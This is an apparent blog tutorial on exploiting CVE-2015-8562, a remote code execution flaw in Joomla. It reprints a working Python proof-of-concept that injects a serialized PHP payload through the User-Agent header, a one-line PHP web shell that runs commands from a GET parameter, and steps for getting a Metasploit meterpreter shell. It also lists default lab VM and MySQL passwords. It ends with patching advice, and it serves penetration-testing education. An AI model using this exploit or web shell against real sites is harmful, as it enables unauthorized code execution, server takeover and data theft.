Introduction:
A critical remote code execution(RCE) vulnerability was discovered in Joomla! websites. This is making a lot of noise because of the following reasons.- It appears that attackers started exploiting this even before the disclosure(0-day).
- It is very easy to exploit this vulnerability.
- Almost all the versions of Joomla are vulnerable under with certain conditions.
What is this vulnerability?
At its core, this is an input validation issue. An attacker can inject arbitrary input using the X-FORWARDED-FOR or User-Agent header to achieve code execution. Detailed analysis has already been covered here, so let’s not re-invent the wheel.Who is vulnerable?
All versions of the Joomla! below 3.4.6 are known to be vulnerable. But exploitation is possible with PHP versions below 5.5.29, 5.6.13 and below 5.5.Lab Setup:
I have created a VM for the readers to get hands on experience while reading this article. It can be downloaded from this link. So, if you want to get the taste of exploiting this vulnerability, download this VM before you proceed further.Login credentials for the VM are as shown below.
Username: joomla
Password: joomla
The application is hosted at http://<ip address>/joomla/
Kali Linux is the attacker’s machine.
Information Gathering:
Let’s gather some information about the target as we do in a typical black box pentest.The default Joomla! Installations come with an administrator control panel at /administrator/ path.
Finding out the Joomla version:
One of the common ways to find Joomla! version is to check “/language/en-GB/en-GB.xml” file.Let’s do it.
Metasploit has got a scanner to find this. We can use that as well.
PHP Version:
Another important thing we need to remember here is the PHP version. As mentioned earlier, exploitation is possible with PHP versions below 5.5.29, 5.6.13 and below 5.5.We can use curl to find the PHP version. Run the following command and observe the response headers.
curl –v –X HEAD http://<ipaddress>/joomla/
Exploitation:
As mentioned in the beginning, this vulnerability is being exploited before it’s public disclosure. But, following is one of the first public exploits available online to exploit this vulnerability.Download links:
http://pastebin.com/PRiK0SWL
(or)
https://www.exploit-db.com/exploits/38977/
”’
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
”’
import requests # easy_install requests
def get_url(url, user_agent):
headers = {
‘User-Agent’: user_agent
}
cookies = requests.get(url,headers=headers).cookies
for _ in range(3):
response = requests.get(url, headers=headers,cookies=cookies)
return response
def php_str_noquotes(data):
“Convert string to chr(xx).chr(xx) for use in php”
encoded = “”
for char in data:
encoded += “chr({0}).”.format(ord(char))
return encoded[:-1]
def generate_payload(php_payload):
php_payload = “eval({0})”.format(php_str_noquotes(php_payload))
terminate = ‘\xf0\xfd\xfd\xfd’;
exploit_template = r”’}__test|O:21:”JDatabaseDriverMysqli”:3:{s:2:”fc”;O:17:”JSimplepieFactory”:0:{}s:21:”\0\0\0disconnectHandlers”;a:1:{i:0;a:2:{i:0;O:9:”SimplePie”:5:{s:8:”sanitize”;O:20:”JDatabaseDriverMysql”:0:{}s:8:”feed_url”;”’
injected_payload = “{};JFactory::getConfig();exit”.format(php_payload)
exploit_template += r”’s:{0}:”{1}””’.format(str(len(injected_payload)), injected_payload)
exploit_template += r”’;s:19:”cache_name_function”;s:6:”assert”;s:5:”cache”;b:1;s:11:”cache_class”;O:20:”JDatabaseDriverMysql”:0:{}}i:1;s:4:”init”;}}s:13:”\0\0\0connection”;b:1;}”’ + terminate
return exploit_template
pl = generate_payload(“system(‘touch /tmp/fx’);”)
print get_url(“http://172.31.6.242/”, pl)
It’s a POC exploit which creates a file inside “/tmp” folder of the target server.
To test this exploit, just modify the last line with your target application’s path.
If you are using the VM provided, it should be “http://<IP Address>/joomla/”
In my case, it is
python joomla_poc.py
This should create a new file with the name “fx” on the target system within “/tmp” folder. This is shown below.
<?php
phpinfo();
?>
Now, access the file “shell.php” to see if it is created.
Let’s add another file to get a shell on the server. Modify the exploit as shown below.
<?php
$cmd=$_GET[‘cmd’];
echo system($cmd);
?>
Let’s use our shell now.
Note: For demonstration purposes, I am directly using the webserver path but it may not be possible in all the cases if the target directory is not writable (The VM used is the default installation and I didn’t add any explicit write permissions). But, it is not hard to circumvent this as we can get an interactive shell using many other ways. You may check this link for more details on this.
While you are running the exploit on your attacking machine, fire up your wireshark and capture the packets on your working interface (in my case, eth1 – HostOnly Adapter) to see what’s happening when you run this exploit.
Exploitation with Metasploit:
As usual, Metasploit has released an exploit for this and made our lives easier. The following figure shows the “Metasploit way” of exploiting this target.First, you need to add this exploit to your Metasploit framework in order to do follow the steps.
If you don’t know how to add it, here’s how.
- Download the exploit into your kali machine from this link.
- Add it to “/usr/share/metasploit-framework/modules/exploits/multi/http/“
- Open up your Metasploit console and type “reload_all“.
Once you set all the required options, you should see a meterpreter shell popping up as shown below.
Note: I deleted all the content from the “joomla_session” table before running metasploit so we can see how it is exploiting the target.
In the VM provided, following are the MySQL credentials.
Username: root
Password: toor
“joomla_session” is the table which holds the session data. “data” is the column to be precise.
What to do now???
If you own a Joomla! Website, go and check if it is vulnerable. You can use the following online service.https://scan.patrolserver.com/joomla/CVE-2015-8562
If it is vulnerable, time to patch it.
[pardot-form id=”19510″ title=”OenTechnation”]
How to patch:
Joomla versions 1.5.x and 2.5.x (EOL)
If you are using the old and unsupported versions 1.5.x or 2.5.x, you have to apply these hotfixes released by the Joomla development team.1.5.x: Session Fix Joomla 1.5.x
2.5.x: Session Fix Joomla 2.5.x
Joomla versions 3.x
Update immediately to version 3.4.6.Note: These work arounds have been taken from the above mentioned online scanning website (https://scan.patrolserver.com/joomla/CVE-2015-8562
).
References:
https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.htmlhttp://pastebin.com/PRiK0SWL
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/joomla_http_header_rce.rb
0 comments:
Post a Comment